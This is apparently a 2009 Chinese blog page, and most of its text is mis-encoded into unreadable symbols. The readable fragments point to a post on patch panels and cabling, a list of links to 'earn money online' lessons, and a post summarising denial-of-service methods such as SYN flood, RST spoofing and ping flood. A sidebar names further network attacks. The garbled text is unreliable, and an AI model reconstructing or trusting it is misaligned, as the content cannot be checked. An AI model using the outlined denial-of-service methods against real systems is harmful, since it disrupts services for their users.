��߰��ʮ�ּ򵥣��˫��ߵ��¾��2-4mm��γ��߰�Ŀ׾��Ȼ��ݰ��ǿ��ѡ��֮��ļ�࣬�ڰ��Ϻ��5��ߡ��5��ߺ��д��ŵĿռ��ȷ��ĳ��ߴ硣��л��¶��ಿ�ֺ�ʹ��ǹ��ڻ��ߵĽ��ȷ��Ŀ׾��25��׺��ô�ɰֽ��еı��ص��Ǻ��ں��д�ϣ��ϣ�1-5�ı�ţ��д�ϣ��ϣ�A-E�ı�ź�󹦸�ɡ�

��߰��һ��25�׷��壨��Ӧ��24��߼ܵĺ��ʳߴ�5��5��߰壬Ҳ��ѡ��4��6��8��8�ȹ�񣩣��ӡ�֣�ÿ�׿��Դ�1��ˮƽ˫��ߡ��󣺵�˫��ߴ��߰�󣬱˴�֮��λ�þͻ��̶��λ�ý��а��ʱ��׳��ִ�Ĵ�λ��󣬸��׳��µĽ��

��߱��

��߱�

Ŀ�꣺ʹ��24��1U��߼ܣ��´��߼ܵ��Һ�ࣨ��߼ܱ��濴��ת��߼ܣ�˫��ߴ��ĵײ��ת��߼ܣ��֤��˫��һֱ��е��21��24��ģ�顣

ע��ͼ�е�1-24��Ϊ��߼�ģ��ı�ţ��ġ��߼�ģ��һһ��Ӧ��ߺš�

��߰��ʹ��Ӧ��߱��ߡ�

��߱��һ��Ϊ��ı��񣬵�ʹ��5��5��߰�ʱ��߱�Ϊ5��5�еı��ÿ��Ԫ��Ӧһ��ס��߱��д��ж��֣�ÿ��д��Ӧ��һ��˳��ͼ�н��һ��˳�򣨿��ִ��߼��ϵ�ģ��ţ��

��ʵ��д��߱�ʱ��Ӧ��߼�1-24�ڶ�Ӧ��ߺ��߱��ߺ��߼ܵ�ģ��ž�һһ��Ӧ��һ��£��߼ܲ��ͼ��ɺ󣬿�ʹ��EXCEL��ܣ��Զ��γ��ÿ��߼ܵ��߱��

��ߵĻ��ʩ��£�

��߼̶ܹ��λ��װ��мܣ��潫��ӡ��ߺŵ��ֽװ��߼ܣ��߼��ϣ��߼ܵ�ģ��ж�£��Ӧж��ģ�飻

1 ��ǩ��е��ߺű�ǩ

��߰嶨λ��߰��ڴ��ǰ��Ӧȷ��䷽��ʹ��߰��߹��в��ҪӲ��Ťת��򣬾Ϳ��ʹE1�׾ͽ��Ȼ��׼1��ģ�飬��ʱ��߰��ϵ�2-5��߼ܵ�2-5�ű��ƽ�С�ͨ��ʹ��ķ��ж�λ��Ƚ��߰崹ֱ��1��ģ�鱳��ʹE1�׶��1��ģ�飨��ֵ�һ�泯��24��ģ�飩��Ȼ��ֳ��߰�˳��δ��·��Ľ��߿��ƶ��ƶ�ʱȷ��߰�ֻ��ƽ��ƶ��ת��߰嵽��߿�ʱ��߰�ķ�λ��Ҫ��A1��λ��ڵķ�λ��Ա��ÿ��߰�ʹ�ã�

2 ��ߺŴ��߰�

��߰崩�ߣ��ڻ��Ľ��߿��ԣ��߰尴2��ȷ��ķ�λ��ķ��ã��ˮƽ˫��߰��ߺ��߱��߰壨��ֵ�һ��Լ��ߴ��ֵ�һ�洩��У��һ��ɣ�һ��ҵ��ߺţ�ֻҪ�ҵ��߰��ߺż��ɣ��·��룬һ�˽��ߴ��߰�Ķ�Ӧ��С�Ӧ��ע��ǣ�˫��Ӧȫ��߰壬Ҳ��Ӧ�ý��߰��ڽ��߿��ԣ��ܱ�֤��˫��ȫ��

3 ��ƺ��߰�ƽ��

·��ߣ��߰��ࣨ��ֲࣩ��߰��˫��һ��Ȼ��߰��ָ��·��Լ��ƽ�ƣ�ƽ��100mm��߰��ٰ��һ�Σ��ֹǰ�ΰ��ɶ��ʱӦע��ʹ��γ�Բ�Σ��Ӧ��߰��ΧһȦ��ߣ��߰��м��ڲ��ȷ��˫��ߵ��ƽ��һֱҪ��ֵ��߼ܵ��Զ�˵�ģ��ࣨ��24��ģ��ࣩ��ƽ��߰�200mm��ң��߰��ע��ÿ��Ӧ��ǰ�ΰ��ʱ��λ��ͬ��Щ�ߴ��ת��ڲ㣬Ҳ��ڲ��ת��㣻��ƽ�ƣ�ֱ��߼�Ϊֹ��

4 �ػ��Ⱦ��̶�

��̶��߹��У��Ա��ż��ϵ��߿׻��ڵ��߰壬��Ӧ�ڰ��ͬʱ��żܻ��ϣ��»��

��ߣ��ƽ�ƹ��ת��ʱ��߰��ת��ǣ��˳��ת�䣬��԰��ǣ��Ǵ��ڲ��߶̣��߳��ֱ�߰��ת�䣬��Ǵ��һ��Σ��Ҫ��е��ֳ��Ȱ��Ƶ��ֳ��

5 ƽ��ת��߼ܺ��

�м��ߣ��߰嵽��߼ܱ��м��Ϻ��Ƚ��м��ϣ�Ȼ��ǰƽ�ƣ�ÿ��һ��ģ��ǰʱ��һ�Σ�Ȼ��ֳ��ģ��Ӧ��ߺš��˹��Ӧ�䱸2�ˣ�1�˷��ߣ�1�˽��ߴ��߼ܱ��߼��ȥ��ģ��ж�£��ߴ�ģ��״��ȥ��ͬʱ2�˳��ź˶��ߺ��߼��ϵ��Ƿ�һ�£�

��ߣ��һ��ߴ��߼��߰��Ѿ�û��һ��ˣ��ʱ��ߵ��

6 ��ײ��1��

��˳��߰��õ��߿ڣ�ʹ��һ��24��߼ܵ��߱��ظ�1-8��һ��ߵ��߹��ֱ��ȫ��ɡ�

��ߣ��֧��ߣ�

7 ��1��ߴ��ģ��

��ж��߼�ʱ��ÿ��߼ܵ��Ӧ�ֱ��ߡ��ڻ��ڵ��߰��ޣ�һ��Ϊ100mm��ֻ�ܲ��Ű��3��4��24��Ϊ800mm�Ļ��Ҳ��ܷ�2��߰壨��ڵ�ˮƽ˫��Ӧ�ӵ��Ӱ��ۣ��ܴﲻ��200��ˮƽ˫��ߵ�Ŀ�ꡣ��ʱ��ʹ�ö��߷�ʽ��ʹ��8��8��߰��48��6��8��һ��߶Ⱥ��1��5��5��߰彫��Ϊ2��󣬼��߼ܡ�

8 ÿ��߳��ʱ��

��Щ��˾ʹ��ߣ��߿��Ա��߰崩��һ��ʱ�Ĺ��򣬵��Ҳ��ȱ�㡣��磺��߹��˫��״��ӳ��߲��ɣ��е��߿��Ѿ��룬��ʱ�ͱ��½��С�

��ڣ��Щ��߳��Ѿ��Ƴ��ר�õ��ģ��Ƭ��·��Ҫռ�ö��Ļ��/�żܿռ䣬��Ҳ��ڼ�С�߼��棬��ͬʱҪ��/�żܾ��и��Ŀռ䡣��һ��ÿ��Ҫ��ٸ�˫��ʱ��Ҫ��ʩ��ǰ��ǵġ�

9 ˫��δ��ģ��

��߻��

��߹��գ��Է��ϵͳ�Ի��Ҫ��ڻ��У��豸��񣨰�װ��㲥��ص��豸��ͨ�Ż��񣨰�װ��豸��豸��񣨰�װ��ķ��߻��񣨰�װ�ۺϲ��ߵ��߼ܼ��豸��ͣ��ڻ��У��豸��ͷ��ר��ۺϲ��ϵͳ��߻��๤��ʵ��ʹ��豸��ͨ�Ż��߻��

��߻��Ϊ�ۺϲ��ϵͳ��ⶨ�ƵĻ��˲��ϵͳ��е�һЩ��Ե�Դ�Ĳ��ر��Ҫ��磺

�ڻ��ĺ��ࣨ�Ӻ��ǰ��󱳰��֮�䣩��װ1��ǰȫ��յĽ��Դ�߲ۣ��ӻ��ײ�һֱ��쵽��񶥲��Ϸ��Ĳ��ר��Ϊ��ȹ��硣��ֱ��װȫ��ս��Դ�߲۵�Ŀ��Ǳ��ˮƽ˫��߲��Դ��š��ڴ��У�ʹ�õ��ˮƽ��װ�ĵ�Դ��߰壬��ֽṹʹ��ֵ�Դ��ˮƽ˫��֮��ļ��С��200mm��ĵ�Դ��ֽṹ��

��߰壺�ڻ��Һ�ࣨ�Ӻ��ǰ��󱳰��֮�䣩��װ2��100mm��壬��ش�ֱ��ÿ��10mm��һ��5��100mm��Բ�ף��峤��Ϊ�ӻ��ĵװ嵽��塣ͬ��ࣨ��Դ�߲��֮�䣩��װһ��ͬ��塣��߰��¶��Ҫ��ƽ��ë�̣��£��߰��ŽӵصĽ��Դ�߲ۣ��߽��ºʹ��õĴ��£�

��̣��󲿿�1��300��200mm�ĳ��ͽ��߿ף��Ƥ��ߣ��˵��¡��ڿ��Ϸ�90mm��԰�װһ��壬��ڵ��ۡ�

ǰ��ಣ��֮�佫��ֱ��߲ۣ��ǣ��ͽṹ��⣩��

�ӵأ��ڻ��в��Ե͵��ֱ��װһ��ӵ�ͭ��ͭ��ÿ��2U�Ⱦ࿪1��M6��˿�ף��Ա��߼ܾͽ��ӵأ��¶˵��˿��ڻ��ӵ��ߡ��ĸ��Ӧ�ӵأ��ʵ�ֻ��ӵأ��һ��ӵ�Ӧͨ��ӵ�ͭ��ϵĽӵ��߽��Ľӵ�ͭ��ϡ�

�ڻ��Ӧ��鲢��˨�ף��в��˨��ܵȼ��ͬ��߻��ŷ��һ��ʱ��ʹ�ò��˨��ӳ�һ��塣

��߼ܰ�װ��˿Ӧ��䣨��42U��ԣ��Ҫ��84�װ�װ��˿��ȥĿ��ȷ��߼ܡ��豸�Ϳ��ȫ��ʹ��ͬ�İ�װ��˿��ܱ�֤��ۡ�

��˹��ɿɲ�жʽ��Է��˺�ʩ��ܹ��ж��6Ƭ��ǰ��ϡ��¡��ң��ڰ�װ��䡣�ڵ��ֳ��󣬿��ͨ��˿��ƴװ�ɻ��񣬵��Ÿ߶��ʱ��ڻ��

��߼��ۺϲ��ߣ��ô��ɫ��߼ܣ��߼ܿ��ʹ��ڻ��еĲ��߸��ۣ��Ϣ��̶��ǽ�ϣ��ģ�飬ҲҪ��߰��ɫ��ģ��У�Ȼ��Ϣ��У��ʱֻҪ��һͷ��΢��һͷ��Ϣ��м��

��߼�   ��   ��񾭵��
          ͨѶ�Һ��豸�ҵ��þ��ǲ��ϵͳ��࣬�ӹ��ӹ��ˮƽ��߼��û��򽻲�ķ�ʽ��ӵ��豸�˿ڡ��µĻ��򽻲��ӵ��ͨ��ģ�黯��߻��ʵ�ֵġ�
          ��߼��ɻ��Ϊģ�黯��߼�(Patch   Panel)��IDCʽ��߼ܣ�ģ�黯��߼ܲ��ģ�黯��(RJ-45��)��·��ӣ�IDCʽ��߼ܿɲ��ģ�黯��IDC��(�׳�“Ѽ��”��BIX-BIX��BIX-RJ45��)��Լ��(Jumper   Wire,   Crossconnect   Wire)��·��ӡ�ģ�黯��ߺ�IDC��߿ɷ��ز�Σ��Ҫר�õ�ѹ�߹��(��BIXѹ�ߵ�)��ѹ��IDC��Ŀ��߼��С�
          ��߼��䰲װ��ʽ�ֿɷ�Ϊǽװʽ��װʽ��һ��ģ�黯��߼��Ƴɼ�װ��װ��ͨ��ǽװ֧�ܵȸ��Ҳ��ǽװ��һ��IDCʽ��߼�ͨ��ǽ�ϰ�װ��ͨ��һЩ��װ��ר�ŵ��Ҳ��ڼ�װ��

��߼�
��߼ܿɰ�װ�ڻ��ܵ�ǰ��ṩ��߻��豸��ߵ�ˮƽ��¹��   ��߼ܼ��˽��ϵͳ�Ĺ滮�밲װ,��˵,��ߵ�,��̫��.��ûʲôֱ�ӵĹ�ϵ,ֻΪ�Ժ�ù��.

���� 鿴��

��׬��ѵ

panhc007 — 2009-09-24 12:58

��һ�� ׬�Ļ��
http://xiaodaocn.blogbus.com/logs/20028540.html

�ڶ�� ׬�ļ��ʽ�Լ��ȱ��
http://xiaodaocn.blogbus.com/logs/20028576.html

�� ׬��רҵ�� Լ� ��׬��
http://xiaodaocn.blogbus.com/logs/20028603.html

��Ŀ� ��ѡ��ʺ��Լ��׬��Ŀ
http://xiaodaocn.blogbus.com/logs/20028642.html

�� վ׬Ǯ֮��ѡ��
http://xiaodaocn.blogbus.com/logs/20028807.html

��-��ѡ��Ϳռ�
http://xiaodaocn.blogbus.com/logs/20028855.html

��߿�-��ֿ��ٽ��Լ��վ�Ͳ��
http://xiaodaocn.blogbus.com/logs/20028891.html

�ڰ˿�—-��ѡ��
http://xiaodaocn.blogbus.com/logs/20028957.html

�ھſ�- ��ˢ��Լ�ʶ��׵��վ
http://xiaodaocn.blogbus.com/logs/20029071.html

��ʮ��-��׬��֮��ר��Լ��ˢAlexa��
http://xiaodaocn.blogbus.com/logs/20057025.html

��ʮһ��---׬Ǯʵ��һ.�ֹ�SEO��ٶ�֪��ø��
http://xiaodaocn.blogbus.com/logs/20152029.html

��ʮ��---׬Ǯʵ��.��뵯��P2P��һ�׬Ǯ
http://xiaodaocn.blogbus.com/logs/20289681.html

��ʮ��-�ذ��,�ջ�ҳ+��ҳʵս��
http://xiaodaocn.blogbus.com/logs/20409984.html

��ʮ�Ŀ�---��ܷ��6λQQ�Ź��׬��Ŀ��Ļ
http://xiaodaocn.blogbus.com/logs/20556714.html

��ʮ��---��Ŀ��׬ȫ��
http://xiaodaocn.blogbus.com/logs/20663223.html

����Ʒ�� 鿴��

DDoS��ʵʩ�ķ��ܽ�

panhc007 — 2009-09-24 12:52

�˽�DDOS��ʵʩ��DDoS��Ŀ�ʼ��ô��һ��DDoS��˽��Ϊ��ȷ��ȫ�Ŀ��ǣ��ô��ЩDDoS��ʵʩ��أ��һһ��һ�£�

1��SYN FLOOD��ʽ��DDOS��

��÷��ӻ��Backlog Queue��ĳ��TCP��Header��˲��ϵسɱ��ֻ��SYN��־��TCP��󡣵��յ�ʱ�򣬶��Ϊ��û�н��Ϊ��Щ��Ự��ŵ��С�

��SYN��󳬹��˷��ɵ��޶ȣ��ô��Ͳ��ٽ��µ��ˡ��Ϸ��û��Ӷ��ܾ��Գ��SYN��ͣ�ֱ��ж��ֻ��SYN��ǵ��кܶ�ʵʩSYN FLOOD�Ĺ��ߣ��Ǻǣ��Լ��ȥ�ɡ�

2��IP��ƭDDOS��

��ֹ��RSTλ��ʵ�֡��һ��Ϸ��û�(1.1.1.1)�Ѿ�ͬ��ӣ��߹��칥��TCP��ݣ�αװ�Լ��IPΪ1.1.1.1��һ��RSTλ��TCP��ݶΡ��յ��ݺ��Ϊ��1.1.1.1��͵��д��󣬾ͻ��ջ��н��õ��ӡ��ʱ��Ϸ��û�1.1.1.1�ٷ��ͺϷ��ݣ��Ѿ�û��ˣ��û��ͱ��¿�ʼ��ӡ��ʱ��α��IP��ַ��Ŀ�귢��RST��ݣ�ʹ��ԺϷ��û��

3��DDOS��

��Ӵ��㹻��ֲ��Ǻܴ��Է��ķ��Ļ��ķ��Ĵ��ֹ��˶��ˣ��SYNһ��ʵʩDDOS��޴󡣲��ǳ��DOS��Ǻǡ�Ping�׹��㷢��˰��

4��ĵ�DDOS��

��һ��ʽ�Ĺ��ַ��˵��ʽ��Ϊ��ʽ��ϵͳ��BUG��Win95 (winsock v1), Cisco IOS v.10.x, ��ʱ��ϵͳ��DOS��ǰ��ͻ��IP�Ͷ˿�Ū��IP�˿��ͬ��͸��ʹ��Լ��TCP��ӡ��©��ܿ��Դ��Ĺ⡣ֱ�ӵ��µ��αװ��һЩ��֤ϵͳ��в�޴�ġ�

��ЩʵʩDDOS��ֶ��Ҫ�ľ��ǹ��Ҫ��TCP��ݣ��TCPЭ�顣��Щ��ǽ��TCP��ϵġ��DDOS��ֶΡ�

5��Ӳ�̷�ʽDDOS��

ͨ��û��Ƶ�ִ��д��ô��ܳ�Ϊ��Ӳ��DDOS��;��磺��ʼ��һ�㹫˾�ķ��ܰ��ʼ��WEB��һ��ƻ��߿��Է��ʹ��ʼ��Щ�ʼ��ܶ��һ��ʼ��л��߾��ǻ��ʼ��У�ֱ��䱻��ƻ��߰�Ӳ�� ־��¼��߿��Թ��Ĵ��Ϣ��ͳ��¼��Щ��󣬿��ܾ��־�ļ��ǳ��Ӵ��Ӳ�̡�ͬʱ��ù��Աʹ��Դ��־��Ͳ��ܷ��;��FTP��ļ��Ҳ��Ӳ�̿ռ䡣

6��ò��Խ��DDOS��

һ��й��ʻ��İ�ȫ��ԣ��磬ĳ��ʻ��3�ε�½ʧ�ܣ��ô��ʺŽ��Ҳ��Ա��ƻ��ã��αװһ��ʺ�ȥ��½��ʹ��ʺű��ĺϷ��û��Ͳ��ʹ��ʺ�ȥ��½ϵͳ�ˡ�

DDOS��ʽ�Ļ��ܵ��ϣ��˽��Լ��DDOS��

��Hacker Information �鿴��

anti-security

�����������Ӿ�Ĺ�Ѫ̨�ʺͳ���......

������N�ַ���

���繥������

Smurf����

Fraggle����

land����

WinNuke����

Teardrop����

Tiny Fragment

IPSpoofing����

UDP��ˮ

syn flood

2012�ر�����ָ��

H3C secpath����ǽ͸��ģʽ����

Ӳ�̻����޸�

raid5�齨

Cisco VPN����ʵ��

���ֲ��ܼ���Win 7 ����������ͽ������

ǰ��

�������

�������

����

cisco��H3C nat���öԱ�

������������ͷip��������

һ��������Ŀ�����Ĺ滮

��������豸��װ

��׬��ѵ

DDoS����ʵʩ�ķ����ܽ�

��Ӿ�Ĺ�Ѫ̨�ʺͳ��......

��N�ַ��

��繥��

Smurf��

Fraggle��

land��

WinNuke��

Teardrop��

IPSpoofing��

2012�ر��ָ��

H3C secpath��ǽ͸��ģʽ��

Ӳ�̻��޸�

Cisco VPN��ʵ��

��ֲ��ܼ��Win 7 ��ͽ��

��

��

��

cisco��H3C nat��öԱ�

��ͷip��

һ��Ŀ��Ĺ滮

��豸��װ

DDoS��ʵʩ�ķ��ܽ�